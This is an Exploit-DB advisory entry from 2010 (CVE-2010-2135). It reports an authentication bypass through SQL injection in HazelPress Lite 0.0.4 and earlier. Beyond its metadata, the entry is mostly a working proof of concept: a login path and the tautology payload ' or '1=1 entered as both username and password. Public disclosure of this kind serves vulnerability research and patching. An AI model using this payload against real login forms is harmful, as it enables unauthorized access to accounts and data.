HazelPress Lite <= 0.0.4 Auth Bypass SQL Injection Vulnerability

2010-02-28T00:00:00
ID EDB-ID:11602
Type exploitdb
Reporter cr4wl3r
Modified 2010-02-28T00:00:00

Description

HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability. CVE-2010-2135. Webapps exploit for php platform

                                        
                                            # HazelPress Lite &lt;= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: http://hazelpress.org/index.php?hazel=downloads

# PoC: [path]/login.php

# Username: ' or '1=1
# password: ' or '1=1